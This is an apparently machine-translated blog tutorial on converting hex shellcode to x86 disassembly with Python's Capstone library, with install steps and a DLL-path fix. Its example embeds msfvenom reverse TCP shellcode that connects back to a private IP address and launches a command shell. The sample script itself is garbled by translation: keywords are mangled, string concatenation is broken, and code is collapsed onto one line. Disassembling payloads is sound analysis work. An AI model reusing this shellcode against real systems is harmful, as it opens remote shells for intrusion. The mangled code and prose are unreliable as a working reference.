"Python" uses Python to convert Shellcode into a compilation

1. Introduction

How many lines of code do you need to convert hex into disassembly?
Thanks to the Python Capstone Library, it only takes five elements to do this.
In binary analysis, when exploit development or reverse engineering is performed, it is necessary to quickly decompile the hexadecimal shellcode into disassembly. You can use an anti-compilation tool like OllyDbg or Ida Pro, but if you don't want to perform this small task with a mature anti-compilation tool, the following Python code will help you convert the shellcode into an disassembly form

If you have not installed capstone, then you need to install it using the following methods:

2. Installation 2.1, based on Debian

Use the following command to download and install.
Note: There is already a Kali Linux.

 apt-get install python-capstone

2.2. Windows-based

Windows needs to download the following MSI file after you run the Graphical Wizard to install it:
+ bit

https://github.com/aquynh/capstone/releases/download/3.0.5-rc2/capstone-3.0.5-rc2-python-win32.msi

A Bit

https://github.com/aquynh/capstone/releases/download/3.0.5-rc2/capstone-3.0.5-rc2-python-win64.msi

3. Example

This example is a reverse TCP connection that was picked out from Msfvenom shellcode

#!/usr/bin/env pythonfrom Capstone Import *shellcode = "Shellcode + =" \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\ x64\x8b "Shellcode + =" \x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7 "Shellcode + =" \x4a\x26\x31\xff\xac\x3c\ X61\X7C\X02\X2C\X20\XC1\XCF "Shellcode + =" \x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c "Shellcode + =" \x8b\ x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01 "Shellcode + =" \xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\ X31 "Shellcode + =" \xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d "Shellcode + =" \xf8\x3b\x7d\x24\x75\xe4\x58\ x8b\x58\x24\x01\xd3\x66 "Shellcode + =" \x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0 "Shellcode + =" \x89\x44\ x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f "Shellcode + =" \x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68 " Shellcode + = "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" Shellcode + = "\x90\x01\x00\x00\x29\xc4\x54\x50\ x68\x29\x80\x6b\x00 "Shellcode + =" \xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f "shellCode + = "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x74\x80\x68" Shellcode + = "\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\ X57\x68\x99\xa5 "Shellcode + =" \x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec "Shellcode + =" \x68\xf0\xb5\xa2\ x56\xff\xd5\x68\x63\x6d\x64\x00\x89 "Shellcode + =" \xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66 "Shellcode + = "\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44" Shellcode + = "\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\ x53\x56\x68 "Shellcode + =" \x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30 "Shellcode + =" \x68\x08\x87\x1d\x60\ xff\xd5\xbb\xaa\xc5\xe2\x5d\x68 "Shellcode + =" \xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0 "shellcode + =" \ X75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5 "MD = Cs (cs_arch_x86, cs_mode_32) for I in Md.disasm (Shellcode, 0x00): Print ("0x%x:\t%s\t%s"% (i.address, i.mnemonic, I.op_str))

Code Explanation:

md = Cs(CS_ARCH_X86, CS_MODE_32): 初始化类，给两个参数（硬件架构和硬件模式）for i in md.disasm(shellcode, 0x00):  disasm 反汇编这段HEX, 它的参数是shellcode和起始地址。print(“0x%x:\t%s\t%s” %(i.address, i.mnemonic, i.op_str)):打印地址和操作数。

4. Results

Save the above code and execute it, and the following screen shows a compilation of Hex (shellcode) output in Python script

Figure: Converting hex to disassembly with a simple Python script

5. Practice part

I encountered an error while installing Capstone.
The error message is as follows:

Traceback (most recent call last):  File "sl.py", line 2, in <module>    from capstone import *  File "C:\Python27\lib\site-packages\capstone\__init__.py", line 249, in <module>    raise ImportError("ERROR: fail to load the dynamic library.")ImportError: ERROR: fail to load the dynamic library.

All the way down to debug, and finally found that the cTYPES load DLL when the error, do not know why.

C:\Python27\Lib\site-packages\capstone\__init__.py

So I manually changed the 210-line code lib path to the absolute path of the DLL.

    _lib = "capstone.dll" # 修改前    _lib = "C:\\Python27\\lib\\site-packages\\capstone\\lib\\capstone.dll" # 修改后

The modified code is as follows:

if sys.platform == ‘darwin‘:    _lib = "libcapstone.dylib"elif sys.platform in (‘win32‘, ‘cygwin‘):    _lib = "C:\\Python27\\lib\\site-packages\\capstone\\lib\\capstone.dll"else:    _lib = "libcapstone.so"

6, the results after the operation of the practice

7. Reference

https://haiderm.com/convert-hex-assembly-using-simple-python-script/

"Python" uses Python to convert Shellcode into a compilation